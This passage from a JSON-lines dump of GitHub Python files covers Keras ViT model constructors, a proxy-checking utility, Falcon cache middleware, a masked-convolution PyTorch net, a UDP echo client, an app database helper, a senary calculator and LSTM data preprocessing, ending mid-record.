input_shape=input_shape,\n input_tensor=input_tensor,\n pooling=pooling,\n num_classes=num_classes,\n patch_size=MODEL_CONFIGS[\"ViTTiny32\"][\"patch_size\"],\n transformer_layer_num=MODEL_CONFIGS[\"ViTTiny32\"][\n \"transformer_layer_num\"\n ],\n project_dim=MODEL_CONFIGS[\"ViTTiny32\"][\"project_dim\"],\n mlp_dim=MODEL_CONFIGS[\"ViTTiny32\"][\"mlp_dim\"],\n num_heads=MODEL_CONFIGS[\"ViTTiny32\"][\"num_heads\"],\n mlp_dropout=MODEL_CONFIGS[\"ViTTiny32\"][\"mlp_dropout\"],\n attention_dropout=MODEL_CONFIGS[\"ViTTiny32\"][\"attention_dropout\"],\n activation=activation,\n classifier_activation=classifier_activation,\n **kwargs,\n )\n\n\ndef ViTS32(\n *,\n include_rescaling,\n include_top,\n name=\"ViTS32\",\n weights=None,\n input_shape=(None, None, 3),\n input_tensor=None,\n pooling=None,\n num_classes=None,\n activation=keras.activations.gelu,\n classifier_activation=\"softmax\",\n **kwargs,\n):\n \"\"\"Instantiates the ViTS32 architecture.\"\"\"\n\n return ViT(\n include_rescaling,\n include_top,\n name=name,\n weights=parse_weights(weights, include_top, \"vits32\"),\n input_shape=input_shape,\n input_tensor=input_tensor,\n pooling=pooling,\n num_classes=num_classes,\n patch_size=MODEL_CONFIGS[\"ViTS32\"][\"patch_size\"],\n transformer_layer_num=MODEL_CONFIGS[\"ViTS32\"][\"transformer_layer_num\"],\n project_dim=MODEL_CONFIGS[\"ViTS32\"][\"project_dim\"],\n mlp_dim=MODEL_CONFIGS[\"ViTS32\"][\"mlp_dim\"],\n num_heads=MODEL_CONFIGS[\"ViTS32\"][\"num_heads\"],\n mlp_dropout=MODEL_CONFIGS[\"ViTS32\"][\"mlp_dropout\"],\n attention_dropout=MODEL_CONFIGS[\"ViTS32\"][\"attention_dropout\"],\n activation=activation,\n classifier_activation=classifier_activation,\n **kwargs,\n )\n\n\ndef ViTB32(\n *,\n include_rescaling,\n include_top,\n name=\"ViTB32\",\n weights=None,\n input_shape=(None, None, 3),\n input_tensor=None,\n pooling=None,\n num_classes=None,\n activation=keras.activations.gelu,\n classifier_activation=\"softmax\",\n **kwargs,\n):\n \"\"\"Instantiates the ViTB32 architecture.\"\"\"\n\n return ViT(\n include_rescaling,\n include_top,\n name=name,\n weights=parse_weights(weights, include_top, \"vitb32\"),\n input_shape=input_shape,\n input_tensor=input_tensor,\n pooling=pooling,\n num_classes=num_classes,\n patch_size=MODEL_CONFIGS[\"ViTB32\"][\"patch_size\"],\n transformer_layer_num=MODEL_CONFIGS[\"ViTB32\"][\"transformer_layer_num\"],\n project_dim=MODEL_CONFIGS[\"ViTB32\"][\"project_dim\"],\n mlp_dim=MODEL_CONFIGS[\"ViTB32\"][\"mlp_dim\"],\n num_heads=MODEL_CONFIGS[\"ViTB32\"][\"num_heads\"],\n mlp_dropout=MODEL_CONFIGS[\"ViTB32\"][\"mlp_dropout\"],\n attention_dropout=MODEL_CONFIGS[\"ViTB32\"][\"attention_dropout\"],\n activation=activation,\n classifier_activation=classifier_activation,\n **kwargs,\n )\n\n\ndef ViTL32(\n *,\n include_rescaling,\n include_top,\n name=\"ViTL32\",\n weights=None,\n input_shape=(None, None, 3),\n input_tensor=None,\n pooling=None,\n num_classes=None,\n activation=keras.activations.gelu,\n classifier_activation=\"softmax\",\n **kwargs,\n):\n \"\"\"Instantiates the ViTL32 architecture.\"\"\"\n\n return ViT(\n include_rescaling,\n include_top,\n name=name,\n weights=weights,\n input_shape=input_shape,\n input_tensor=input_tensor,\n pooling=pooling,\n num_classes=num_classes,\n patch_size=MODEL_CONFIGS[\"ViTL32\"][\"patch_size\"],\n transformer_layer_num=MODEL_CONFIGS[\"ViTL32\"][\"transformer_layer_num\"],\n project_dim=MODEL_CONFIGS[\"ViTL32\"][\"project_dim\"],\n mlp_dim=MODEL_CONFIGS[\"ViTL32\"][\"mlp_dim\"],\n num_heads=MODEL_CONFIGS[\"ViTL32\"][\"num_heads\"],\n mlp_dropout=MODEL_CONFIGS[\"ViTL32\"][\"mlp_dropout\"],\n attention_dropout=MODEL_CONFIGS[\"ViTL32\"][\"attention_dropout\"],\n activation=activation,\n classifier_activation=classifier_activation,\n **kwargs,\n )\n\n\ndef ViTH32(\n *,\n include_rescaling,\n include_top,\n name=\"ViTH32\",\n weights=None,\n input_shape=(None, None, 3),\n input_tensor=None,\n pooling=None,\n num_classes=None,\n activation=keras.activations.gelu,\n classifier_activation=\"softmax\",\n **kwargs,\n):\n \"\"\"Instantiates the ViTH32 architecture.\"\"\"\n\n return ViT(\n include_rescaling,\n include_top,\n name=name,\n weights=weights,\n input_shape=input_shape,\n input_tensor=input_tensor,\n pooling=pooling,\n num_classes=num_classes,\n patch_size=MODEL_CONFIGS[\"ViTH32\"][\"patch_size\"],\n transformer_layer_num=MODEL_CONFIGS[\"ViTH32\"][\"transformer_layer_num\"],\n project_dim=MODEL_CONFIGS[\"ViTH32\"][\"project_dim\"],\n mlp_dim=MODEL_CONFIGS[\"ViTH32\"][\"mlp_dim\"],\n num_heads=MODEL_CONFIGS[\"ViTH32\"][\"num_heads\"],\n mlp_dropout=MODEL_CONFIGS[\"ViTH32\"][\"mlp_dropout\"],\n attention_dropout=MODEL_CONFIGS[\"ViTH32\"][\"attention_dropout\"],\n activation=activation,\n classifier_activation=classifier_activation,\n **kwargs,\n )\n\n\nsetattr(ViTTiny16, \"__doc__\", BASE_DOCSTRING.format(name=\"ViTTiny16\"))\nsetattr(ViTS16, \"__doc__\", BASE_DOCSTRING.format(name=\"ViTS16\"))\nsetattr(ViTB16, \"__doc__\", BASE_DOCSTRING.format(name=\"ViTB16\"))\nsetattr(ViTL16, \"__doc__\", BASE_DOCSTRING.format(name=\"ViTL16\"))\nsetattr(ViTH16, \"__doc__\", BASE_DOCSTRING.format(name=\"ViTH16\"))\nsetattr(ViTTiny32, \"__doc__\", BASE_DOCSTRING.format(name=\"ViTTiny32\"))\nsetattr(ViTS32, \"__doc__\", BASE_DOCSTRING.format(name=\"ViTS32\"))\nsetattr(ViTB32, \"__doc__\", BASE_DOCSTRING.format(name=\"ViTB32\"))\nsetattr(ViTL32, \"__doc__\", BASE_DOCSTRING.format(name=\"ViTL32\"))\nsetattr(ViTH32, \"__doc__\", BASE_DOCSTRING.format(name=\"ViTH32\"))\n","repo_name":"keras-team/keras-cv","sub_path":"keras_cv/models/legacy/vit.py","file_name":"vit.py","file_ext":"py","file_size_in_byte":25241,"program_lang":"python","lang":"en","doc_type":"code","stars":857,"dataset":"github-code","pt":"67"} +{"seq_id":"26754712106","text":"from json import dumps\nfrom json import loads\nfrom typing import Dict\nfrom typing import Generator\nfrom urllib.parse import urlparse\n\nfrom pymongo.cursor import Cursor\nfrom pymongo import MongoClient\nfrom pymongo.collection import Collection\n\nfrom inspect_proxies.utils import InspectResult\nfrom inspect_proxies.utils import pp\n\n\ndef total_numbers(func):\n\n numbers = {'invalid': 0, 'valid': 0}\n\n def wrapper(doc, *args, **kwargs):\n if doc.get('exception') and doc.get('exception') != 'None':\n numbers['invalid'] += 1\n else:\n numbers['valid'] += 1\n\n res = func(doc, *args, **kwargs)\n print(numbers)\n\n return res\n\n return wrapper\n\n\ndef collect_invalid_ips(func):\n import datetime\n from os.path import abspath\n from os.path import dirname\n path = dirname(dirname(dirname(abspath(__file__))))\n with open('{}/invalid_ips.txt'.format(path), 'a') as f:\n f.write('\\n\\n\\n{} invalid proxy\\n'.format(datetime.datetime.today()))\n\n def wrapper(doc, *args, **kwargs):\n if doc.error and doc.error != 'None':\n proxy = parse_requests_proxy(doc.proxy)\n with open('{}/invalid_ips.txt'.format(path), 'a') as f:\n f.write('ip:{} port:{}\\n'.format(proxy['ip'], proxy['port']))\n\n res = func(doc, *args, **kwargs)\n\n return res\n\n return wrapper\n\n\ndef _parse_auth_uri(uri: str) -> Dict:\n if '@' in uri:\n split_res = uri.split('@')\n user, pwd = split_res[0].split(':')\n host, port = split_res[1].split(':')\n else:\n user, pwd = (None, None)\n host, port = uri.split(':')\n return {\n 'username': user,\n 'password': pwd,\n 'ip': host,\n 'port': int(port)\n }\n\n\ndef parse_requests_proxy(proxy: Dict) -> Dict:\n \"\"\"\n :param proxy: {'http': 'http://...'}\n :return: Dict: keys include username, password, ip, port\n \"\"\"\n for scheme, p in proxy.items():\n res = {'scheme': scheme}\n auth = urlparse(p).netloc\n res.update(_parse_auth_uri(auth))\n return res\n\n\ndef output_format_view_proxy(doc: InspectResult) -> Dict:\n \"\"\"\n Handle result of output_format view proxy document\n :param doc:\n :return:\n \"\"\"\n res = output_format(doc)\n del res['proxy']\n res['exception'] = str(res['exception'])\n res.update(parse_requests_proxy(doc.proxy))\n return res\n\n\n@collect_invalid_ips\ndef output_format_filter_invalid_proxy(doc: InspectResult) -> Dict:\n \"\"\"\n Handle result of output_format view proxy document\n :param doc:\n :return:\n \"\"\"\n res = output_format(doc)\n if res['exception'] is None and res['status'] == 200:\n del res['proxy']\n del res['exception']\n res.update(parse_requests_proxy(doc.proxy))\n return res\n else:\n return dict()\n\n\ndef output_format(doc: InspectResult) -> Dict:\n \"\"\"\n from once inspect result extract message\n :param doc: result of inspect proxy\n :return:\n \"\"\"\n resp = doc.response\n if resp:\n seconds = resp.elapsed.total_seconds()\n status = resp.status_code\n else:\n seconds = None\n status = None\n return {\n 'proxy': dumps(doc.proxy),\n 'url': doc.url,\n 'spend_time': seconds,\n 'status': status,\n 'exception': type(doc.error) if doc.error is not None else None\n }\n\n\n@total_numbers\ndef output_position_console(doc: Dict):\n\n pp.pprint(doc)\n\n\ndef output_position_mongodb(doc: Dict, coll: Collection):\n if doc:\n coll.insert_one(doc)\n\n\ndef create_request_proxy(line: [str, Dict]) -> Dict:\n \"\"\"\n :param line: dict or json\n {'ip': '', 'port': '', 'username': '', 'password':'', 'scheme': ''}\n :return: dict: {'scheme': 'proxy'}\n \"\"\"\n if type(line) is str:\n line = loads(line.strip(',').replace(\"'\", '\"'))\n if type(line) is not dict:\n raise TypeError(\n \"excepted type of line is dict, is not {}\".format(type(line))\n )\n if not line:\n return {}\n if line.get('username'):\n return {\n line['scheme']: '{scheme}://{username}:{password}@'\n '{ip}:{port}'.format(\n scheme=line['scheme'], username=line['username'],\n password=line['password'], ip=line.get('ip') or line['domain'],\n port=line.get('port', 80 if line['scheme'] == 'http' else 443)\n )\n }\n else:\n return {\n line['scheme']: '{scheme}://{ip}:{port}'.format(\n scheme=line['scheme'],\n ip=line.get('ip') or line['domain'],\n port=line.get('port', 80 if line['scheme'] == 'http' else 443)\n )\n }\n\n\ndef file_storage(path: str) -> Generator:\n \"\"\"\n :param path: file path\n :return: line\n \"\"\"\n with open(path) as f:\n for _ in f:\n line = _.strip()\n if line:\n yield line\n\n\ndef mongodb_storage(\n mongo_uri: str, db: str, coll: str, _filter: Dict={}\n) -> Cursor:\n client = MongoClient(mongo_uri)\n coll = client[db][coll]\n return coll.find(_filter, no_cursor_timeout=False)\n\n\nif __name__ == '__main__':\n storage = file_storage('../../tests/docs/proxies_demo.txt')\n for i in storage:\n print(create_request_proxy(i))\n","repo_name":"for-mao/inspect-proxies","sub_path":"inspect_proxies/utils/function.py","file_name":"function.py","file_ext":"py","file_size_in_byte":5319,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"} +{"seq_id":"38547203968","text":"\"\"\"Falcon cache provider middleware module.\"\"\"\n# third-party\nimport falcon\n\n\nclass CacheMiddleware:\n \"\"\"Cache middleware module.\n\n Args:\n provider (CacheProvider): An instance of cache provider (memcache or Redis).\n \"\"\"\n\n def __init__(self, provider: object):\n \"\"\"Initialize class properties.\"\"\"\n self.provider = provider\n\n def _testing(self, req):\n \"\"\"Update req context with values for testing.\"\"\"\n if hasattr(self, 'user_key'):\n # inject a test user_key for pytest monkeypatch\n req.context.user_key = self.user_key # pylint: disable=no-member\n\n def process_resource(\n self, req: falcon.Request, resp: falcon.Response, resource: object, params: dict\n ): # pylint: disable=unused-argument\n \"\"\"Process the request after routing and provide caching service.\"\"\"\n # for pytest testing\n self._testing(req)\n\n # update the cache control for the current resource\n cache_control = {}\n if hasattr(resource, 'cache_control') and isinstance(resource.cache_control, dict):\n cache_control = resource.cache_control\n\n # update cache control\n self.provider.cache_control(cache_control)\n\n if self.provider.enabled:\n cache_key = self.provider.cache_key(req, resource)\n try:\n cache_data = self.provider.get_cache(cache_key)\n except Exception as e: # pragma: no cover; pylint: disable=broad-except\n # cache is best effort, process normally if cache not available\n cache_data = None\n if hasattr(resource, 'log'):\n resource.log.error(f'[cache-provider] Failed reading from cache ({e}).')\n\n if cache_data is not None:\n resp.context.setdefault('cache_data', cache_data)\n resp.context['response_cached'] = True\n resp.complete = True # signal short-circuit for response processing\n\n def process_response(\n self, req: falcon.Request, resp: falcon.Response, resource: object, req_succeeded: bool\n ):\n \"\"\"Set or delete cache for provided resources.\"\"\"\n if not self.provider.enabled:\n return\n\n if req_succeeded and self.provider.enabled:\n resp.set_header('X-Cache', 'MISS') # set x-cache header to default of no cache\n cache_key: str = self.provider.cache_key(req, resource)\n\n if req.method in self.provider.methods:\n if resp.context.get('cache_data') is not None:\n # set body to cached data and stop response\n resp.set_header('X-Cache', 'HIT') # update x-cache header for HIT (from cache)\n resp.text = resp.context.get('cache_data')\n elif resp.text is not None:\n # cache data\n try:\n self.provider.set_cache(cache_key, resp.text)\n except Exception as e: # pragma: no cover; pylint: disable=broad-except\n # cache is best effort, process normally if cache not available\n if hasattr(resource, 'log'):\n resource.log.error(f'[cache-provider] Failed writing to cache ({e}).')\n","repo_name":"bcsummers/falcon-provider-cache","sub_path":"falcon_provider_cache/middleware.py","file_name":"middleware.py","file_ext":"py","file_size_in_byte":3292,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"67"} +{"seq_id":"13681150632","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom torch.autograd import Variable\n\n\nclass MaskedConv2d(nn.Conv2d):\n def __init__(self, in_channels, out_channels, kernel_size, stride=1, \\\n padding=0, dilation=1, groups=1, bias=False, use_gpu=False):\n super(MaskedConv2d, self).__init__(in_channels, out_channels,\n kernel_size, stride, padding,\n dilation, groups, bias)\n self.masked_channels = []\n self.mask_flag = False\n self.masks = None\n self.use_gpu = use_gpu\n\n def forward(self, x):\n if self.mask_flag == True:\n self._expand_masks(x.size())\n weight = self.weight * self.masks\n return F.conv2d(x, weight, self.bias, self.stride, self.padding,\n self.dilation, self.groups)\n else:\n return F.conv2d(x, self.weight, self.bias, self.stride,\n self.padding, self.dilation, self.groups)\n\n\n def set_masked_channels(self, masked_channels):\n self.masked_channels = masked_channels\n if len(masked_channels) == 0:\n self.mask_flag = False\n else:\n self.mask_flag = True\n\n def get_masked_channels(self):\n return self.masked_channels\n\n def _expand_masks(self, input_size):\n if len(self.masked_channels) == 0:\n self.masks = None\n masks = []\n batch_size, _, height, width = [int(input_size[i].item()) for i in range(4)]\n for mask_idx in range(len(self.masked_channels)):\n channel = [b[i].item()] * width\n channel = [channel] * height\n masks.append(channel)\n masks = [masks] * batch_size\n masks = Tensor(masks)\n if self.use_gpu:\n masks = masks.cuda()\n self.masks = Variable(masks, requires_grad=False, volatile=False)\n\n\nclass CustomNet(nn.Module):\n def __init__(self, num_classes, use_gpu=False):\n super(CustomNet, self).__init__()\n self.conv1_1 = MaskedConv2d(3, 64, 3, padding=1, use_gpu=use_gpu)\n self.conv2_1 = MaskedConv2d(64, 128, 3, padding=1, use_gpu=use_gpu)\n self.conv3_1 = MaskedConv2d(128, 256, 3, padding=1, use_gpu=use_gpu)\n\n self.fc1 = nn.Linear(4096, 4096)\n self.fc2 = nn.Linear(4096, num_classes)\n self.softmax = nn.Softmax(dim=1)\n\n def forward(self, x):\n out = F.relu(self.conv1_1(x))\n out = F.max_pool2d(out, 2)\n\n out = F.relu(self.conv2_1(out))\n out = F.max_pool2d(out, 2)\n\n out = F.relu(self.conv3_1(out))\n out = F.max_pool2d(out, 2)\n\n out = out.view(out.size(0), -1)\n out = F.relu(self.fc1(out))\n out = F.relu(self.fc2(out))\n return self.softmax(out)\n","repo_name":"lionminhu/structured-sparsity-learning","sub_path":"models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":2824,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"67"} +{"seq_id":"24222351485","text":"import socket\r\nimport datetime\r\n\r\nclientSocket = socket.socket (socket.AF_INET, socket.SOCK_DGRAM)\r\nechoServerIP = input(\"Enter the IP address of the echo server\")\r\nechoServerPort = int(input(\"Enter the port number of the echo server\"))\r\nechoMSG = \"echo message\"\r\naverageRTT = 0\r\n\r\nfor i in range (0,5):\r\n t1 = datetime.datetime.now()\r\n clientSocket.sendto(echoMSG.encode('utf-8'), (echoServerIP, echoServerPort))\r\n data, address = clientSocket.recvfrom(1024)\r\n t2 = datetime.datetime.now()\r\n averageRTT += (t2 - t1).microseconds\r\n print (\"Round trip time \", i+1, \" \", (t2-t1).microseconds, \"microseconds\")\r\n\r\naverageRTT = averageRTT/5\r\nprint('Average RTT: ', averageRTT, \" microseconds\")\r\nclientSocket.close()\r\n","repo_name":"OmarBekdache/EECE-350-assignment-1","sub_path":"client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":730,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"30939077113","text":"from typing import Callable\n\nfrom pathlib import Path\n\nimport sqlmodel\nfrom loguru import logger\n\nfrom ... import demo\n\nfrom .abstractions import DatabaseStorage\n\n\nclass DatabaseStorageImpl(DatabaseStorage):\n \"\"\"Database storage implementation.\"\"\"\n\n def __init__(self, store_demo_timetracking_dataframe: Callable, debug_mode: bool):\n # database config\n super().__init__()\n self.app_dir = self.ensure_app_dir()\n self.db_path = self.app_dir / \"tuttle.db\"\n self.store_demo_dataframe_callback = store_demo_timetracking_dataframe\n self.debug_mode = debug_mode\n\n def create_model(self):\n logger.info(\"Creating database model\")\n sqlmodel.SQLModel.metadata.create_all(self.db_engine, checkfirst=True)\n\n def ensure_database(self):\n if not self.db_path.exists():\n self.db_engine = sqlmodel.create_engine(\n f\"sqlite:///{self.db_path}\", echo=True\n )\n self.create_model()\n else:\n logger.info(\"Database exists, skipping creation\")\n\n def reset_database(self):\n logger.info(\"Clearing database\")\n try:\n self.db_path.unlink()\n except FileNotFoundError:\n logger.info(\"Database file not found, skipping delete\")\n self.db_engine = sqlmodel.create_engine(\n f\"sqlite:///{self.db_path}\",\n echo=self.debug_mode,\n )\n self.create_model()\n\n def install_demo_data(\n self,\n ):\n self.reset_database()\n try:\n demo.install_demo_data(\n n_projects=4,\n db_path=self.db_path,\n on_cache_timetracking_dataframe=self.store_demo_dataframe_callback,\n )\n logger.info(\"Demo data installation completed\")\n except Exception as ex:\n logger.exception(ex)\n logger.error(\"Failed to install demo data\")\n\n def ensure_app_dir(self) -> Path:\n app_dir = Path.home() / \".tuttle\"\n if not app_dir.exists():\n app_dir.mkdir(parents=True)\n return app_dir\n","repo_name":"tuttle-dev/tuttle","sub_path":"tuttle/app/core/database_storage_impl.py","file_name":"database_storage_impl.py","file_ext":"py","file_size_in_byte":2093,"program_lang":"python","lang":"en","doc_type":"code","stars":50,"dataset":"github-code","pt":"67"} +{"seq_id":"41749837337","text":"class Senary:\n \"\"\"Class that implements operations on numbers in the senary numeral system.\"\"\"\n\n def __init__(self, value: int):\n \"\"\"Initialize the Senary object with a decimal value.\"\"\"\n self.value = value\n\n def __add__(self, other: 'Senary') -> 'Senary':\n \"\"\"Add two senary numbers and return the result as a Senary object.\"\"\"\n return Senary(self.value + other.value)\n\n def __sub__(self, other: 'Senary') -> 'Senary':\n \"\"\"Subtract two senary numbers and return the result as a Senary object.\"\"\"\n return Senary(self.value - other.value)\n\n def __int__(self) -> int:\n \"\"\"Convert the Senary object to a decimal integer.\"\"\"\n return self.value\n\n @staticmethod\n def from_senary(senary_str: str) -> 'Senary':\n \"\"\"Convert a senary string to a Senary object.\"\"\"\n # Check if the senary string is negative\n negative = False\n if senary_str[0] == \"-\":\n negative = True\n senary_str = senary_str[1:]\n # Convert the senary string to a decimal integer\n decimal = 0\n for i, char in enumerate(reversed(senary_str)):\n decimal += int(char) * (6 ** i)\n # If the senary string was negative, negate the decimal value\n if negative:\n decimal = -decimal\n # Return the decimal value as a Senary object\n return Senary(decimal)\n\n def to_senary(self) -> str:\n \"\"\"Convert the Senary object to a senary string.\"\"\"\n senary = \"\"\n value = self.value\n if value < 0:\n senary = \"-\"\n value = abs(value)\n while value > 0:\n senary = str(value % 6) + senary\n value = value // 6\n if senary[-1] == \"-\":\n return str(-int(senary[:-1]))\n else:\n return senary\n\n\nclass SenaryCalculator:\n \"\"\"Class that implements a menu for performing operations on numbers in the senary numeral system.\"\"\"\n\n def __init__(self):\n \"\"\"Initialize the SenaryCalculator object.\"\"\"\n self.menu = \"\"\"\n Senary Calculator\n\n 1. Add two senary numbers\n 2. Subtract two senary numbers\n 3. Convert a senary string to a decimal integer\n 4. Convert a decimal integer to a senary string\n 5. Exit\n\n Enter your choice (1-5): \"\"\"\n\n def handle_input_error(self) -> None:\n \"\"\"Handle input errors.\"\"\"\n print(\"Invalid input. Try again.\")\n\n def add_senary_numbers(self) -> None:\n \"\"\"Add two senary numbers.\"\"\"\n try:\n a = Senary.from_senary(input(\"Enter the first senary number: \"))\n b = Senary.from_senary(input(\"Enter the second senary number: \"))\n print(\"The result is:\", (a + b).to_senary())\n except ValueError:\n self.handle_input_error()\n\n def subtract_senary_numbers(self) -> None:\n \"\"\"Subtract two senary numbers.\"\"\"\n try:\n a = Senary.from_senary(input(\"Enter the first senary number: \"))\n b = Senary.from_senary(input(\"Enter the second senary number: \"))\n print(\"The result is:\", (a - b).to_senary())\n except ValueError:\n self.handle_input_error()\n\n def convert_senary_to_decimal(self) -> None:\n \"\"\"Convert a senary string to a decimal integer.\"\"\"\n try:\n senary_str = input(\"Enter a senary number: \")\n decimal = int(Senary.from_senary(senary_str))\n print(\"The equivalent decimal number is:\", decimal)\n except ValueError:\n self.handle_input_error()\n\n def convert_decimal_to_senary(self) -> None:\n \"\"\"Convert a decimal integer to a senary string.\"\"\"\n try:\n decimal = int(input(\"Enter a decimal number: \"))\n senary = Senary(decimal).to_senary()\n print(\"The equivalent senary number is:\", senary)\n except ValueError:\n self.handle_input_error()\n\n def run(self) -> None:\n \"\"\"Run the SenaryCalculator menu.\"\"\"\n while True:\n # Display the menu\n choice = input(self.menu)\n\n # Validate the choice\n try:\n choice = int(choice)\n if choice < 1 or choice > 5:\n raise ValueError\n except ValueError:\n print(\"Invalid option. Try again.\")\n continue\n\n # Perform the selected operation\n if choice == 1:\n self.add_senary_numbers()\n elif choice == 2:\n self.subtract_senary_numbers()\n elif choice == 3:\n self.convert_senary_to_decimal()\n elif choice == 4:\n self.convert_decimal_to_senary()\n elif choice == 5:\n print(\"Exiting the program.\")\n break\n\n\n# calculator = SenaryCalculator()\n# calculator.run()\n","repo_name":"cobaltCorsair/senary_calculator","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4875,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"70942439","text":"from keras.models import Sequential, load_model\nfrom keras.layers import Dense, LSTM, Dropout, Bidirectional, TimeDistributed\nfrom keras.optimizers import Adam\nimport pandas as pd \nfrom datetime import datetime\nimport numpy as np\nfrom sklearn.preprocessing import MinMaxScaler\nfrom matplotlib import rcParams\nimport pickle\n\nSPLIT = .7\nTIMESTEPS = 7\nMIN_CORR = .5\n\n\nclass Preprocess():\n \"\"\"Data preprocessor class for the LSTM model.\n \n Parameters\n ----------\n corr_limit : Float\n Minimum level of correlation among features\n \n Attributes\n -------\n corr_limit : Float\n Minimum level of correlation among features\n \n Methods\n -------\n loadData()\n Data loader\n selectFeatures(dataframe, target)\n Selector of the features according to their correlation\n reshapeData(data)\n Data reshaper\n descaleData(y_hat)\n Data descaler\n scaleData(X_toScale, *y)\n Data scaler\n \"\"\"\n def __init__(self, corr_limit):\n self.corr_limit = corr_limit\n\n def loadData(self):\n \"\"\"Load the data from a .csv file and put them\n into a Pandas Dataframe.\n \n Returns\n -------\n pandas.DataFrame, numpy.ndarray\n Dataframe containing the data and the relative array of labels\n \"\"\"\n # Read Offerte Pubbliche \n off = (\n pd\n .read_csv('../data/bid.csv', index_col='Unnamed: 0')\n .drop(\n columns = [\n 'DLY_AWD_QTY',\n 'TYPE', \n 'DLY_PRICE', \n 'DLY_AWD_PRICE'\n ]\n )\n )\n # Resampling\n off = off.set_index(pd.DatetimeIndex(off.index))\n off = off.resample('D').sum()\n # Get OFF(t) as feature\n label = np.roll(off['DLY_QTY'], -1, axis=0)\n # Discard the first values\n off = off[:-1]\n label = label[:-1]\n \n # Read MGP\n mgp = (\n pd\n .read_csv('../data/mgp.csv', index_col='Timestamp')\n .iloc[1:]\n )\n mgp = mgp.set_index(pd.DatetimeIndex(mgp.index))\n mgp = mgp.resample('D').mean()\n mgp = mgp.iloc[:-(TIMESTEPS)]\n\n # Merge dataframes\n merged = pd.merge(\n mgp, \n off, \n left_index=True, \n right_index=True\n )\n \n return merged[self.selectFeatures(merged, label)], label\n \n def selectFeatures(self, dataframe, target):\n \"\"\"Select the features of interest according to \n the wanted minimum correlation among them.\n \n Parameters\n ----------\n dataframe : pandas.DataFrame\n Data\n target : numpy.ndarray\n The target variables\n \n Returns\n -------\n List\n The list of selected features\n \"\"\"\n dataset = dataframe.copy()\n cols=[x for x in dataframe.head()]\n dataset['Target'] = target\n\n corr = dataset.corr()\n corr = corr.drop(columns=cols).dropna()\n corr = corr.where(abs(corr['Target'])>self.corr_limit).dropna()\n features = [x for x in corr.index if x != 'Target']\n \n return features\n \n def reshapeData(self, data):\n \"\"\"Reshape a 2-d Dataframe to 3-d.\n \n Parameters\n ----------\n data : pandas.DataFrame\n 2-d Data\n \n Returns\n -------\n pandas.DataFrame\n 3-d Data\n \"\"\"\n data1 = np.zeros(shape=(data.shape[0],1,data.shape[1]), dtype=float)\n data1[:,0,:] = data\n data2 = np.zeros(shape=(data.shape[0],TIMESTEPS,data.shape[1]), dtype=float)\n for i in range(data.shape[0]-TIMESTEPS+1):\n for j in np.arange(0,TIMESTEPS):\n data2[i,j] = data1[j+i]\n return data2\n \n def descaleData(self, y_hat):\n \"\"\"Descale the data from [0, 1] to original.\n \n Parameters\n ----------\n y_hat : numpy.ndarray\n Array to be descaled\n \n Returns\n -------\n numpy.ndarray\n Descaled array\n \"\"\"\n with open('../models/lstmScalery.pkl', 'rb') as file:\n scaler_y = pickle.load(file)\n\n y_hat_r = y_hat.reshape(y_hat.shape[0],y_hat.shape[1])\n y_hat_d = scaler_y.inverse_transform(y_hat_r)\n\n return y_hat_d\n \n def scaleData(self, X_toScale, *y):\n \"\"\"Scale the data to [0, 1] range.\n \n Parameters\n ----------\n X_toScale : numpy.ndarray\n Data to be scaled\n \n Returns\n -------\n numpy.ndarray, numpy.ndarray, numpy.ndarray, numpy.ndarray\n Scaled arrays of train and test set\n \"\"\"\n if len(y)>0:\n y = y[0]\n\n # Initialize the training and test items\n x_test = X_toScale[int(X_toScale.shape[0]*SPLIT):,:,:]\n x_train = X_toScale[:int(X_toScale.shape[0]*SPLIT),:,:]\n \n x_train_s = np.zeros((x_train.shape[0],x_train.shape[1],x_train.shape[2]))\n x_test_s = np.zeros((x_test.shape[0],x_test.shape[1],x_test.shape[2]))\n \n # Scale each feature of X\n for i in range(X_toScale.shape[1]):\n scaler_x = MinMaxScaler(feature_range=(0, 1))\n scaler_y = MinMaxScaler(feature_range=(0, 1))\n\n scaler_x.fit(x_train[:,i,:])\n\n x_train_s[:,i,:] = scaler_x.transform(x_train[:,i,:])\n x_test_s[:,i,:] = scaler_x.transform(x_test[:,i,:])\n # Save the scalers\n with open(f'../models/lstmScaler{i}x.pkl', 'wb') as file:\n pickle.dump(scaler_x, file)\n\n \n y_test = y[int(y.shape[0]*SPLIT):,:]\n y_train = y[:int(y.shape[0]*SPLIT),:]\n \n # Scale each feature of y\n scaler_y.fit(y_train)\n\n y_train_s = np.zeros((y_train.shape))\n y_test_s = np.zeros((y_test.shape))\n\n y_train_s = scaler_y.transform(y_train)\n y_test_s = scaler_y.transform(y_test)\n\n y_test_s = y_test_s.reshape(y_test_s.shape[0],y_test_s.shape[1],1)\n y_train_s = y_train_s.reshape(y_train_s.shape[0],y_train_s.shape[1],1)\n # Save the scaler\n with open('../models/lstmScalery.pkl', 'wb') as file:\n pickle.dump(scaler_y, file)\n\n\n return x_train_s, y_train_s, x_test_s, y_test_s\n\n else:\n # Load the scalers and scale the provided dataset\n x_scaled = np.zeros((X_toScale.shape[0],X_toScale.shape[1],X_toScale.shape[2]))\n for i in range(X_toScale.shape[1]):\n with open(f'../models/lstmScaler{i}x.pkl', 'rb') as file:\n scaler_x = pickle.load(file)\n x_scaled[:,i,:] = scaler_x.transform(X_toScale[:,i,:])\n\n return x_scaled\n\nclass Correlation():\n \"\"\"Class to perform correlation analysis for the LSTM model.\n \n Parameters\n ----------\n corr_limit : Float\n Minimum level of correlation among features\n \n Attributes\n -------\n corr_limit : Float\n Minimum level of correlation among features\n \n Methods\n -------\n loadData()\n Data loader\n selectFeatures(dataframe, target)\n Selector of the features according to their correlation\n \"\"\"\n def __init__(self, corr_limit):\n self.corr_limit = corr_limit\n\n def loadData(self):\n \"\"\"Load the data from a .csv file and put them\n into a Pandas Dataframe.\n \n Returns\n -------\n pandas.DataFrame, numpy.ndarray\n Dataframe containing the data and the relative array of labels\n \"\"\"\n # Read Offerte 